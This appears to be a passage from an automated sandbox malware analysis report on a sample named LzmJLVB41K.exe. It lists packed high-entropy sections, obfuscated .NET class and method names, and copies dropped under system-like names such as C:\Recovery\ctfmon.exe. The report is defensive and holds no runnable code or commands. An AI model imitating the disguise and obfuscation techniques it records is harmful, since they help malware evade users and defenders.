                            Source: C:\Recovery\ctfmon.exeCode function: 22_2_00007FFD348853B2 pushad ; ret 22_2_00007FFD348853B5
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 32_2_00007FFD348853B2 pushad ; ret 32_2_00007FFD348853B5
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeCode function: 32_2_00007FFD34898F68 push edx; retf 32_2_00007FFD34898F6D
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeCode function: 51_2_00007FFD348A53B2 pushad ; ret 51_2_00007FFD348A53B5
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348A53B2 pushad ; ret 54_2_00007FFD348A53B5
                            Source: C:\Recovery\ctfmon.exeCode function: 54_2_00007FFD348B8F68 push edx; retf 54_2_00007FFD348B8F6D
                            Source: LzmJLVB41K.exeStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: fontdrvhost.exe.0.drStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: fozAQGvSmfTQIywuzSgk.exe.0.drStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: ctfmon.exe.0.drStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: fozAQGvSmfTQIywuzSgk.exe0.0.drStatic PE information: section name: .text entropy: 7.564809337686255
                            Source: LzmJLVB41K.exe, voJVM2MpBGCvru4CNpv.csHigh entropy of concatenated method names: 'SbobefTYQxfGEZ7ukL4X', 'Js1PjcTYPL4oSZ1QOpDH', 'C4N9FNTYcABN4PpaJBIm', 'cdjFwFTYuB6RfU31BHvX', 's4WhO6TYl9OdQDfLyIpl', 'method_0', 'method_1', 'GJvMf0OKYB', 'aRpMkNQWQr', 'YRjMyR9Jkb'
                            Source: LzmJLVB41K.exe, cGQhe5HojjBqex8eRaD.csHigh entropy of concatenated method names: 'zTOHOpOUFL', 'FoyHXm1IfX', 'iMWH0qrebo', 'B3HH9Y40bS', 'nNmHst6f9b', 'POYHpPt7ah', 'H7WHCLmpf0', 'Os3HfUAusM', 'pMYHkvUrfG', 'pOfHyZWKko'
                            Source: LzmJLVB41K.exe, mGoDWjadko5qLvZXsi5.csHigh entropy of concatenated method names: 'YQua2EUaan', 'AWtaLgKp7U', 'tQRazZkL2r', 'IK4iSCt5AN', 'sNpiTSa8bY', 'CcTiAgNCFC', 'CHpi7Ccuy9', 'j3IiReYKx1', 'sBBiuOFHkJ', 'XCLilWY4JO'
                            Source: LzmJLVB41K.exe, xUdYXoGcAJR7SFBMuyM.csHigh entropy of concatenated method names: 'g2xGVUsCI0', 'rjoS2RT4Qh1oVANNDS43', 'eXOOVCT4uCc3krIxND2t', 'cdQ1o5T4lPKn0D5mZeLC', 'UV1vYJT4PVSTEidqhDJx', 'nms1CYT4cDDdvl9HCq16', 'IPy', 'method_0', 'method_1', 'method_2'
                            Source: LzmJLVB41K.exe, blf0pplVQFf0ERo4bZ4.csHigh entropy of concatenated method names: 'rOrlOHL6Zn', 'z4951mT1gMI9txsRpfdi', 'tJyRjuT1KWnUvnFmDg0V', 'rYF5BhT1NO2sRl25Wbnd', 'E94', 'P9X', 'vmethod_0', 'RiYTREUyJTk', 'YQiTPc37u39', 'imethod_0'
                            Source: LzmJLVB41K.exe, LwCJpwTkGgLvfWPLPjd.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'V4hTQzJjKAy', 'wN6TRThxbul', 'aaJk9pT8qRcDcUqr28ly', 'cDIePXT8IurFMSZ1iFTN'
                            Source: LzmJLVB41K.exe, RxsQ17PocHtIqWj4332.csHigh entropy of concatenated method names: 'IIDPXDXsY5', 'jbjP0RAGXu', 'XnlP9adS4N', 'OtnQgtTjsh5rvTUlvlm4', 'dA1i93Tjp8YymBBdyTkq', 'MeN62pTj0K3g1XdpqO9y', 'BYvCBrTj9Ri3Ba5GbJ3W', 'cyo5mITjCn5LM7Fes67J', 'h8cbHOTjfcN9Vo3y5CTK', 'INI9AHTjkv3601iNBB4U'
                            Source: LzmJLVB41K.exe, Ac7iQV5Jtl2bbtF9WtW.csHigh entropy of concatenated method names: 'ruw5mUrHse', 'ov853hkTcC', 'eXi56x5U1C', 'ovEAZXTwMRUZW2TAGQ4M', 'KxrlJ3TwqG3LqwXU1Fu6', 'QhHSNFTwIGbS6EmXg02o', 'YRok8KTwHAYbRKCJTan2', 'VxsSJXTwVdBmRjAA7snt', 'J0u9u4TwBV9gY3SxZ3qy', 'ogk29lTwtlJ30jmaT9l3'
                            Source: LzmJLVB41K.exe, tdSbcZlj5BMQm30eU9S.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'VfKTPo5FoXx', 'wN6TRThxbul', 'j9x3RIT1a8X0BiwQ4one', 'A57gTjT1ih0S7dF2a4y5', 'LWeXcjT1raxu2WFatJ6O'
                            Source: LzmJLVB41K.exe, rPwVyPQrpGTl6LDscYo.cs | High entropy of concatenated method names: 'aHIQU178Eh', 'rwCQdhIqbj', 'smMmJBTjS1adJyU6lUsy', 'S9ColKTWLw08CnOnVOk8', 'pn5DUaTWzKWQyU0pDMmn', 'l2xICBTjTqNINUvAuI0V', 'dP4QbmHZDU', 'aCtQvL8091', 'dXhQJBGb7F', 'v49QwZJoms'
                            Source: LzmJLVB41K.exe, gdFIA7TLWOAeeig7ONG.cs | High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'aRoTPTVNtr7', 'wN6TRThxbul', 'QXvfB0T8LumyhhXnJIlm', 'kCVvDTT8zBV6DwDFdhib', 'AomJ6gT5ST7TY8t3Ycd6', 'ANP7n9T5T9d8kZAirSu3'
                            Source: LzmJLVB41K.exe, Jb8vPA2aYoo5QSy05Ha.cs | High entropy of concatenated method names: 'B2cTl1Eom68', 'p0ATlW1qagq', 'g1STljJXjkj', 'SKxTlgGNVqQ', 'jGQTlKkqqsN', 's0UTlNmDHew', 'gl0TlGGPbbL', 'RPDLunwKFO', 'hd7TlaeuAEw', 'iQ4Tlip9Eam'
                            Source: LzmJLVB41K.exe, oeiubeMT70heDufFF9d.cs | High entropy of concatenated method names: 'rC9', 'method_0', 'xrNTPyWvNIM', 'Tn4TPEgP3TF', 'P09mCSTrBh6H4yCanhKd', 'IWWphsTrtHw1YFs37yZ8', 'jjwBElTr8wF5qpqUUgr9', 'OWdISVTr5qVfA7OP30i3', 'uTLFV9Trx4slt10wlD7H', 'zJYyl2TreFVnCfBva1K0'
                            Source: LzmJLVB41K.exe, WnLWZhigRCxIL5p1Mqe.cs | High entropy of concatenated method names: 'gr1EsTTZwjE08u6QDb9O', 'DhHLcnTZmc2THEHNwtcQ', 'x0myA6TZvqFqg2smyGp3', 'LmVLiiTZJyrM9Xhinf08', 'iL6BXsTZrCc3UCrpJ7uB', 'zllxo9TZYPEK4GIyo8e6', 'VkrKtMTZaQJ8M9AEvujm', 'ddhTaFTZiRWDhHi1Umfg'
                            Source: LzmJLVB41K.exe, S99bJmRyuNo0up2cC9i.cs | High entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'ofQTPAKx1bc', 'wN6TRThxbul', 'ibBw7yTeM6BusSdsU9Yg', 'zGL5SvTeq3sNaLOSU9HV', 'o1juJyTeIu9qL5teGcFo', 'NvLBySTeH2At4dmBvpw7', 'agB2lUTeVJm8hYLMMprQ'
                            Source: LzmJLVB41K.exe, jULmqic9wu3ZrxC0nup.cs | High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'lJlLOnTgBUdYmqASK68I', 'YV5ZPKTgtmmfTP7w6Ny6', 'xNwC5iTg84R1M1oZ0nQk', 'UiacpXG2Nh'
                            Source: LzmJLVB41K.exe, t6fDLh87cglZpDfL8sk.cs | High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'E4J8uoItMe', 'Write', 'gj98lkNqn7', 'hYk8QqmcZw', 'Flush', 'vl7'
                            Source: LzmJLVB41K.exe, NDn3cZ1MPbRJ7fHEvEn.cs | High entropy of concatenated method names: 'YKAW9C2Ks4', 'DPfTaGT6KWsg4op7tBpP', 'jmdNNqT6jy3vkGiA1m8q', 'DYI1AYT6gRQunV63jhLq', 'c3sMeoT6Nne3hrsdEGDJ', 'kt5', 'w4i1I3adBm', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                            Source: LzmJLVB41K.exe, dkVWw3EbHTSl5iuU9fO.cs | High entropy of concatenated method names: 'Ve7EJQFDwm', 'n75EwAY7Kx', 'Ma7EmQxtTJ', 'FEjGm3Trl2nXSO16eOJ0', 'ipmRJuTrRlBsHSN2CYuy', 'DhbRRNTruDZ3AsgU07Lj', 'od5PMCTrQSDApvEFRdBm', 'SrmOn1TrPj0gK05wKvqf', 'COJXM4TrcJn7Tynsg91N'
                            Source: LzmJLVB41K.exe, wlPAZBcAN38QgpCsyo9.cs | High entropy of concatenated method names: 'OdUcRxp8yN', 'pmtcu4mubs', 'SY6clu51h4', 'C9scQPHQFi', 'm1qcPkUuaa', 'gQ6cc4xL20', 'rkNcoiPjIy', 'aY5chB4uGB', 'GiZcXIx49M', 'vSqc0Hp9ci'
                            Source: LzmJLVB41K.exe, G3CxgjfLibJGpKM96n.cs | High entropy of concatenated method names: 'vBSjyhk9q', 'hhgqaZTteeFZQdjoOunP', 'vu9USBTt52JVaEwJxCg6', 'v2VIppTtx9Ax1mI3CKXn', 'hFmc5uTtOoRN0O9juR5N', 'aBwyXAY4L', 'KVJEYFfBu', 'nXYMvNlQm', 'LfiqLJpyG', 'aIOI8VpMY'
                            Source: LzmJLVB41K.exe, I7DTChAu8UrOIp1e5ED.cs | High entropy of concatenated method names: 'X9jAQSiIrS', 'sTRAPw4spb', 'Ba2AcD6ShJ', 'zi8AoYnQky', 'ebsFMFT50p6SM8VG55C4', 'qCJuAST5hpcUAGbpGNwJ', 'IWicyeT5XT6tDOVsa0XM', 'l8MHOyT59rVrgUgnZrQT', 'PEJVAZT5s8Rc9GcET4ni', 'twFOCVT5pvGCTdJLWWLI'
                            Source: LzmJLVB41K.exe, TEir8cQK3j4eOtMUW8M.cs | High entropy of concatenated method names: 'P9X', 'vmethod_0', 'o17TRHPCHST', 'fMcTPh9tDfH', 'imethod_0', 'GUMbNcTW67T2uwugQlSM', 'e8a4P5TWD03WXfgBZOKi', 'LeFN2xTWmAI60NYNvVHj', 'BnWOEmTW3C4UcvhoWTgF', 'ihG2xJTWnILGXgA5rGHr'
                            Source: LzmJLVB41K.exe, hrtcpiz0VtAcqnx6Yd.cs | High entropy of concatenated method names: 'UHyTTfw0xH', 'a9cT7lekXa', 'AE3TRXhH7j', 'od7TudwgQI', 'GITTlL1tmL', 'yw3TQLPgsb', 'tM9TcoPxW2', 'H1LxcNT8Qiuj7IYPxUbq', 'LFJfIoT8PrXs7pWab0vH', 'yWsuNlT8ceYJPrmphTQt'
                            Source: LzmJLVB41K.exe, DckT484NW6JmPi3IGQ6.cs | High entropy of concatenated method names: 'FuMTPtI9dik', 'SF0TlBxqG4m', 'BZvW5rTdhdywxoouKW0s', 'A3jqTDTdcIjw5bMR90tV', 'GkHR9eTdo1YdHRoobcPC', 'TPcfBHTdstyHU22L41p5', 'p91HhGTd0iLkpQA2h0Ad', 'Ncdh8lTd9Nwp2AoX3NKP', 'j9CaQUTdp7Wu6vo5RYBw', 'imethod_0'
                            Source: LzmJLVB41K.exe, BxwD7qx0kpEvdNQGOcR.cs | High entropy of concatenated method names: 'JO6xsdjX2G', 'g94B8cTwUYqwVEhqJoJa', 'IGNqHFTw4Ry32YxHHrm2', 'BECeAuTwZ52or8ASlAPb', 'WvAvRoTwdU8OSujfbxOe', 'TR2cLPTwF7THO1Hfqcov', 'SdQgvKTw2iONlZnZ9TYm'
                            Source: LzmJLVB41K.exe, K3tWl6Pu9RpPZ3WkQll.cs | High entropy of concatenated method names: 'O3I', 'P9X', 'WS3TRBUO9Dv', 'vmethod_0', 'imethod_0', 'KVq6j7TjPis1VcdGj1BF', 'svbvX5Tjc5PCOhSL70Tm', 'WJLp94TjlDkNbCKY6TIf', 'T4lciaTjQk4xncwMqI1G', 'SHLJMFTjoLFFxF99fqQo'
                            Source: LzmJLVB41K.exe, js75UaxOqwlu101AVus.cs | High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                            Source: LzmJLVB41K.exe, zuPU8d8rHlSoSgr57Fb.cs | High entropy of concatenated method names: 'ztn82FPRLF', 'yJC8zPMkIE', 'GWj8bRBM95', 'MdQ8vqO4mJ', 'Ny88JiYX1W', 'hau8wpJaZ4', 'bxf8mqjyNl', 'Lfn83CAxSD', 'GN086YTKP6', 'tAn8D9T089'
                            Source: LzmJLVB41K.exe, zOg4V1lrnSR8tLh1MbY.cs | High entropy of concatenated method names: 'XjelUJTSHF', 'cLkldY82t1', 'TqTlFg3ILV', 'W816r4T1zT8xV8JCtEQE', 'w2Sk35T12ELSFSGhwfmY', 'iAdXgwT1Lwy46EhP0Ykd', 'zH7lbv9PTn', 'XqWlvw438b', 'q4SlJjtBt9', 'b5nlwx8xpu'
                            Source: LzmJLVB41K.exe, E8hveath7kXJqfbnEY8.cs | High entropy of concatenated method names: 'B7Vt007UxN', 'stHt9D1m71', 'yuDtsbXyqV', 'JSLtpRxpPQ', 'ArFtC8adyU', 'merHA2Tvz7YCZBNleMZc', 'RxHnC7Tv2NI59h7Q7X3A', 'p4RqdVTvLJ32e40jtPoN', 'aKdmVmTJSAHNhtJS4f3l', 'ot7CEATJT9TyWKxkydj4'
                            Source: LzmJLVB41K.exe, OTRAKsdSrA8WMUtWxnT.cs | High entropy of concatenated method names: 'EEedRMpvj4', 'SMcduHfW0G', 'mKUpLFTFwu1nb4PRSKfs', 'XKQCuuTFm2tJDBmgWwXG', 'zudQt4TFv3r1hARstkhs', 'i3DbsbTFJ6Cux3O6mBdX', 'jKiViuTF3skKMP92haM9', 'IBytEDTF6Ma0JA4qctSC', 'Sy5dAOs7MF', 'drvsnPTFrDGJoNVGTpPZ'
                            Source: LzmJLVB41K.exe, L7dqqm2kJPmchlaw3s3.cs | High entropy of concatenated method names: 'l6M2x8ns7j', 'UUX2eOpKj4', 'ziB2O4FmcU', 'ArP21NweBG', 'DTW2W32L5k', 'pmq2jCHSOt', 'qbx2g3cLQ2', 'xab2KN2Qkk', 'z1d2NdmDt2', 'd1X2GLtkpi'
                            Source: LzmJLVB41K.exe, omn1Gfj6aNjwcd5L04U.cs | High entropy of concatenated method names: 'wj47IiTnSJrG7C1BVecn', 'UFj67oTDLmk4Q38bCSQO', 'AfdFsDTDzj3NvIXJsmMI', 'k8sjnXVaZT', 'Mh9', 'method_0', 'jtgj40VgY0', 'HrsjZkWLZb', 'dCtjUKUwo4', 'RH1jdC0B4W'
                            Source: LzmJLVB41K.exe, dQUSN2T4WwE1s43qp0C.cs | High entropy of concatenated method names: 'P9X', 'fEkTUbHeZj', 'N2rTPSnfupy', 'imethod_0', 'whSTdtchTB', 'fQSccwT8ZFyhjYRSiOtq', 'iNfIdyT8nyTubW1APLfk', 'N6rgetT84PYwwqQyFWND', 'wq73jxT8UassDR2tCQYI', 'UJjOJeT8daWgUZh9sxH7'
                            Source: LzmJLVB41K.exe, hwii5bGvvAq0J78MhJq.cs | High entropy of concatenated method names: 'P4PTPVxdelv', 'vVuGw0i0Kq', 'JTVGm8DV6n', 'xYiG34dFlu', 'p8POaOT4yPYinIdBTY6i', 'apkiyHT4EUVlZdnrIKVF', 'gUvm5hT4MX6uOpkKCrUD', 'EwWoXUT4qJI6UQgHoEqo', 'LPdH99T4IDwp1jUTG0ZG', 'aZDZi5T4HyyGWM2isupV'
                            Source: LzmJLVB41K.exe, RTnV16y5B94uaXdOEOw.cs | High entropy of concatenated method names: 'jnDyK8Twfx', 'Vsh8w2Ta6elZs7UkUHPV', 'db40H9TamkXBF1fqKLPA', 'zsVcx9Ta3U33bwce96xP', 'LN2ImHTaDBgDEIZsWLPZ', 'KUpyehgmS1', 'P1XyOHHjJG', 'UsRy1Tma6E', 'JSr9tcTavhCeus2MlXo4', 'dwClOSTaYFimPwr1YjwF'
                            Source: LzmJLVB41K.exe, VdHIESyG8EUcHC3e8JV.cs | High entropy of concatenated method names: 'jgSyJ0o9fI', 'vW8ywHjOS2', 'U8DymeivBL', 'l2QwAfTa2SlGJCs2JpLV', 'JBet87Tadw4ifnQFIR8o', 'pbmH4qTaFU2L33ko22KH', 'eEIyioFewp', 'tyvyr2cTxi', 'Fa7yYMoKa9', 'r8iBEfTa4OLKK0VsLm9Y'
                            Source: LzmJLVB41K.exe, IOOlW35L1NYkq3YD7yc.cs | High entropy of concatenated method names: 'JYExScae1x', 'lfjxT3kpwp', 'xv2xARZ5IK', 'orPx7sP5x4', 'dyjxRTG01b', 'NNxxuCtdQQ', 'd6tMHFTwGTSUO9xc2jg3', 'wgEA2STwKaPR31QcarZh', 'PhhYpQTwNEVvfDCJNZgm', 'fJ458UTwadb68NCeCspR'
                            Source: LzmJLVB41K.exe, Fa8oEdjqsvHrKQW3KAI.cs | High entropy of concatenated method names: 'method_0', 'caqjHhNn2j', 'method_1', 'X61', 'Ly2', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length', 'get_Position'
                            Source: LzmJLVB41K.exe, XiVpQk76WKPQidqtc5W.cs | High entropy of concatenated method names: 'uYHR760Je9', 'mIuRRr20JQ', 'MWsRuryRnI', 'JsPItsTelNJhG5X0UTS7', 'uQxGqSTeQXXjNo1HkXrZ', 'wpHQy0TeRAuJZaZQOuTs', 'U1ri9cTeuPodrHGhOHL0', 'EMYRhRabsw', 'WsIgfFTehi2vfPsi4EFa', 'DhAX6yTecIeHjtZb1EEV'
                            Source: LzmJLVB41K.exe, gwsj7UUOH68G5enUw3f.cs | High entropy of concatenated method names: 'tohUWf6RSi', 'hcDUjvkMcX', 'AEYUgirctJ', 'BXhUKwPGPo', 'Dispose', 'al0BMITFy2qmsAmVR92Y', 'RThKjNTFf8afGeIS4Dyr', 'w8hS1LTFk1IBJELxl39w', 'qjMsKFTFEEAZutoLTy8J', 'PV3KJ6TFM9rG96mCa0v0'
                            Source: LzmJLVB41K.exe, QkMfjXQy8cZ4Rtd3VCu.cs | High entropy of concatenated method names: 'V93Q5l00Pm', 'keysghTWWr5BRtykFujD', 'TJj602TWjYDEm2JX6iso', 'A5kvt0TWOT4DlpTxdHqX', 'LiJEUPTW15TeLKJ20hdk', 'q8R2GDTWgkyQvW9rIYB5', 'OQQkSBTWKRSVZOFh4BlX', 'KnBQMe4AxU', 'ateQqI0vvA', 'TaTQIwNilT'
                            Source: LzmJLVB41K.exe, Alushx29ZpQi3KArJrn.cs | High entropy of concatenated method names: 'k9fAuiBq2NK', 'sHsAurVMF5X', 'MCiIPPT2NoQ4OcCFSSWe', 'NpK0aiT2GYZIjgysrs98', 'Oeaep1T2aegsCs8bM1WU', 'tlpv4YT2i5DugFIeZ8Hn', 'CQovrFT2r6J37PptorRv'
                            Source: LzmJLVB41K.exe, QYEY8wOPmuZIqUcZ1Ij.cs | High entropy of concatenated method names: 'HOhOoSDTOA', 'Gh1Ohfkr7u', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'smROXvWD4v', 'method_2', 'uc7'
                            Source: LzmJLVB41K.exe, GiVTbCxP923Nflcna4N.cs | High entropy of concatenated method names: 'AZ0xo7JZoa', 'ehaxhLb1qQ', 'r9OxXQFjUL', 'vH7fnPTwm4mm6wMPIMK8', 'LDXd0STwJZnk1ZKoloyi', 'KehHNHTwwylNDLSGsv47', 'A9RxyLTw3PbxuN2j0vLo', 'vW4BxPTw6WhLy4Q5CQTI', 'TPFfhvTwD28w5E0AySkG'
                            Source: LzmJLVB41K.exe, rBHPqPPCygu5pA15Ucd.cs | High entropy of concatenated method names: 'G4uPEVEt8I', 'Ve5EMWTjxxL3BVZIypmj', 'R38gHBTj84gpEyMrZ5hd', 'Bw4g9oTj5nERMiDRohXw', 'TGrRjuTjeyvBAg0jqsxn', 'IP6PkK5kaM', 'sG77JiTjIykgO8Jq27No', 'mvAg5ITjHY3Lvypftaa7', 'oR0lPmTjVjXH4UEcJakb', 'ufKoeoTjMpSA62kD3Nr0'
                            Source: LzmJLVB41K.exe, RAY7x8A6GZIX8T3uGh2.cs | High entropy of concatenated method names: 'UP87QtqGxR', 'gn4kQHTxTI06cYGeleKY', 'o5JMghTxAtrkcXFJJHTK', 'minrwQTx7HLtAg8bOLjV', 'GMtZMATxRKZZ3Kwc44XS', 'J3rUKUT5zLyac3CZDXIb', 'm1NEFETxSxSFG9nQDe7G', 'omwX8WTxu40fdbNRnPhW', 'R8AWwPTxlUkWUljosjwX', 'pfx7Sr81BM'
                            Source: LzmJLVB41K.exe, INhTJBaOBERvyBlYdST.cs | High entropy of concatenated method names: 'qx1aWFIRAx', 'KoTajZ12ay', 'UGnagu6b7D', 'zZPaK0jhFy', 'So4aNn2QJV', 'k9jaGsEa2h', 'V5haaMmbVd', 'CoVaiMFgMP', 'YJEarKdg18', 'aNnaYI7g1k'
                            Source: LzmJLVB41K.exe, v9fMBeE9SF7tuqx2CeR.cs | High entropy of concatenated method names: 'vcOEEDE2Ky', 'fJvu3dTiN2BwdTakZjqN', 'xKmmuFTiG4HNrQlQNa0v', 'PqiRs4TigxG2uLvjoAyv', 'g79Fm3TiKLTxFSO90q5s', 'zsWEp18QWj', 'CYRvFwTie6YGVNJJCDiT', 'F8Ai1FTi5wCbw5K2lsU4', 'PkUp0uTixEt8lH88whYW', 'VJEsbfTiOixUK5yTAsIB'
                            Source: LzmJLVB41K.exe, tJqBKo7tqVPSOFTO0Cx.cs | High entropy of concatenated method names: 'RQc7YpHxtc', 'Con7b89a53', 'LQw7vFKXlF', 'PkeLwkTxb5BhGPfdcoxm', 'epdKW9TxvvZqLLHUdLuh', 'FZbrCpTxrrmZSpv0t1ok', 'a5H3VlTxYiWMAW2wde4e', 'rpK754uHrS', 'zNr7x7R4Ts', 'YCC7eYvrO5'
                            Source: LzmJLVB41K.exe, d4I6rExi1YvgKsDQnRJ.cs | High entropy of concatenated method names: 'XotxYASAL8', 'nNSxbxDEdj', 'kaKxvFdp2g', 'zgHxJCaUyH', 'tQWxwqMBw6', 'Jp2xmZwxQ4', 'GZhx3woWk8', 'T2Ax64NNua', 'oqWxDUTDu4', 'GwcxnM73xw'
                            Source: LzmJLVB41K.exe, YCmwl2sIulduN4lwAZW.cs | High entropy of concatenated method names: 'EBiy0f7LYD', 'bGYy9TsUny', 'VtPSIRTa5umVC5eyDT8d', 'XlfmO0TatJunMFBrda1o', 'P9SCalTa8BAI4AueiY5V', 'UeN5tuTaxct0j1xyh6nk', 'e6iAkoTae9N7mZl04b9q', 'Vadyyx2q4s', 'KDD46uTajvWXXt8vr455', 'mQyCuATa1H9ZWqpDMkTE'
                            Source: LzmJLVB41K.exe, LAbj0HupAKCwpFk7jTG.cs | High entropy of concatenated method names: 'Woeu8kO8nw', 'yYmu5ic69s', 'SdxuxrfPxc', 'tTsNHcTOGvVc30HaFw90', 'Po42sTTOanOTF9RDsa3w', 'JN2vrlTOKWRyAk91GOk0', 'uo7AIUTONkUSmqWkEyjN', 'He8uH6lJua', 'bj0uVXjD28', 'aI25MdTOjNmncYcUxEiJ'
                            Source: LzmJLVB41K.exe, bUalnXuDMOiV63kQvQ4.cs | High entropy of concatenated method names: 'tIBuFn7ntN', 'O51u2JnLx3', 'vcwuLaDdUh', 'Jkluzmjk4u', 'fnElSWchNT', 'ko1lTRXdxx', 'xJplAXnDoa', 'fJ3LkfT1XVdArvXFbuPB', 'X54ZUsT1ohit4wDBhUVO', 'LEvyUJT1he4i1DXpunsN'
                            Source: LzmJLVB41K.exe, Ktvq0jU0VV4pOLWydip.cs | High entropy of concatenated method names: 'tMfUp503JO', 'ANuUy7Yncs', 'My4UqEa8u2', 'BeKUIYRHHT', 'rEAUHioxwp', 'E41UVWt3yC', 'JsdUBceYPf', 'z7aUtQVKKn', 'Dispose', 'Irb1DXTFXhdFsuCNTVfV'
                            Source: LzmJLVB41K.exe, o3jdqM4OO2G2qUoUMh6.cs | High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'pWS4WZv7qt', 'UXjuowTUKVvwZi4lm5LV', 'harKRxTUNfQ9mi1xwfLv', 'kNWFrcTUGRomTKf7k1SK', 'cJIGETTUaKr63TL9mxuI', 'HGtk1BTUihAElCwpbVGR', 'aKhmhKTUraCV2suI7MrO'
                            Source: LzmJLVB41K.exe, wpIikoAEbFx9T2Zeor8.cs | High entropy of concatenated method names: 'Oj0AqnPVfh', 'y49AIFgYYF', 'M3T2RXT5Bc5a8jcJuDgp', 'O4EfGIT5HEsZFZQZQuLj', 'MauuCWT5V2C8DsbZQoyI', 'hMDbDmT5tXxUEkXMqSon', 'NWDP8xT58v7JSp2ivhfr', 'TRmtQMT55JaQldHJ7kSB', 'RiZ5YsT5xMJovgaQ1c8F', 'hSO1w1T5eFg8iFpCOw9o'
                            Source: LzmJLVB41K.exe, ewFOuZcHSiAO8oOwHd8.cs | High entropy of concatenated method names: 'ltI8uFTN8YTy4Rv75KE5', 'JH4XNWTNBo3Z1pefccw6', 'DPRwpnTNtjbS1EWUndjY', 'E6U9LlBh4E', 'ftoQfITNOYusvvOoyNsZ', 'THLwgHTNx0Aifqenfrw5', 'u9E0eVTNejBtfNqR5UvK', 'tiPMBjTN1N8eU1uI5Yak', 'eB9eXSTNWBrp76X1tOL6', 'jFFsTKqv7v'
                            Source: LzmJLVB41K.exe, i2f2FtjNvKeV7nd9F7b.cs | High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'uxmjavTwmZ', 'r9qjiYsGKU', 'g5GjrWmKgA', 'PmAjYBrcxw', 'UREjb7iudv', 'sHYjvU9rFV', 'M4nrAZTDGRBAxs6SoqXH'
                            Source: LzmJLVB41K.exe, XXygTFW6iOy4GelEkPY.cs | High entropy of concatenated method names: 'xXaWnsQQGx', 'k6r', 'ueK', 'QH3', 'm9yW4BR2du', 'Flush', 'CriWZoVfM8', 'obHWUfb4LS', 'Write', 'LV9WdhuJjK'
                            Source: LzmJLVB41K.exe, jB9pjU5nWKBQs4XU02Q.cs | High entropy of concatenated method names: 'Jy05ZWGDwd', 'kB95Ue0ila', 'hfF5d244eJ', 'he65F3wdvp', 'tT3524l7B7', 'pTsuuDTw55MV0iWdTQmf', 'JBclk5Twxu5Sj5GJVOPY', 'QkQRg0Twes47d0IRX7d3', 'BsrLHwTwOCGUuafHkjNc', 'gJjx2MTw1UH0ROJlSxpq'
                            Source: LzmJLVB41K.exe, UfbdfLeL6UUYLVMt5HB.cs | High entropy of concatenated method names: 'oSZOSTYRby', 'cIfOTgasJ9', 'Yd7', 'g6AOAvIIMR', 'pFaO7u437q', 'keeORU6iqr', 'fWvOuoVqO4', 'KMZbj1T3a6YYbqhPRQUk', 'Ekh27ET3NjgEHFuHvhAC', 'Ajn0G5T3GcUjhmBiwvgK'
                            Source: LzmJLVB41K.exe, mAHLcrVbgQb08pfPvUm.cs | High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'uqMVJ63XBV', 'J9RVw0MsKI', 'Dispose', 'D31', 'wNK'
                            Source: LzmJLVB41K.exe, r4YPeGtOffRi0UJppow.cs | High entropy of concatenated method names: 'method_0', 'KfDtWrW6ho', 'AEHtjUrsbb', 'gq2tgrhkZp', 'fCYtKwxXTB', 'cgJtNPCsUd', 'kt4tGKCWAu', 'CovSQrTJcQ4UC3AeOQqy', 'mTkJgLTJQpdZtkYMUBei', 'sL6OZkTJPqL1dUqwNPmS'
                            Source: LzmJLVB41K.exe, jvypqJy4BPBprl7E6bc.cs | High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'LHNTP01EQlg', 'zKlTRJ2qr2o', 'pFPXkBTilah4IPweqY52', 'hcWhmHTiQfarW0jmirLX', 'Sctt2hTiPkvXlrgTTQ0L', 'cgdBA1Tic21MykF9BYoO', 'SEIJkrTioc4VSyLEWsVU'
                            Source: LzmJLVB41K.exe, tc0gYKq0vG5vy2QGlp4.cs | High entropy of concatenated method names: 'Q8cHTGDO6J', 'iW28XMTbpsvtvCBchgRQ', 'ClH6tPTb9HExlKEaBhca', 'jK2FTWTbsvEegg4Fv0n8', 'RwrgCbTbCeqFaY0t8b2i', 'yNRqsM9S6r', 'IutqpKqxbE', 'uPdqC65lxO', 'eLXqft3MXH', 'tS8qkicvKy'
                            Source: LzmJLVB41K.exe, W1yhQpub6yFeZPDjZ5C.cs | High entropy of concatenated method names: 'R6ru3GUSDJ', 'aGQIIDT1SYH6oIX0L8fJ', 'mDBpQeT1TShesVAH8a1h', 'V6PkohT1ATLCgkP6tRiY', 'AIqp0rT17h5F9OBS2eyk', 'U1J', 'P9X', 'DJoTRpWOc6P', 'OqOTRCwMChe', 'cyJTPQM28NU'
                            Source: LzmJLVB41K.exe, yOC1ivO8VMrtFb591Fs.cs | High entropy of concatenated method names: 'iFM', 'method_0', 'method_1', 'method_2', 'method_3', 'lbi', 'Itr', 'smethod_0', 'method_4', 'KPS'
                            Source: LzmJLVB41K.exe, BsRfmRdfV3IS2HGBuC2.cs | High entropy of concatenated method names: 'rcYErmT2PHWneuEynRuM', 'JDenekT2cTQceZWGajYH', 'mexF4Td6DQ', 'Mt2MmnT20MtOpeupZl6p', 'R9wd8xT29aNmhf6Orh63', 'dOaosgT2sxdQ1AJ1nKIt', 'gDFGUuT2pnZy5i3juhdn', 'N0UdEvT2CWmyQCDo7I21', 'rFHSj1T2fNtMHIuTmIqM', 'YINdMUT2kICETsg7uoya'
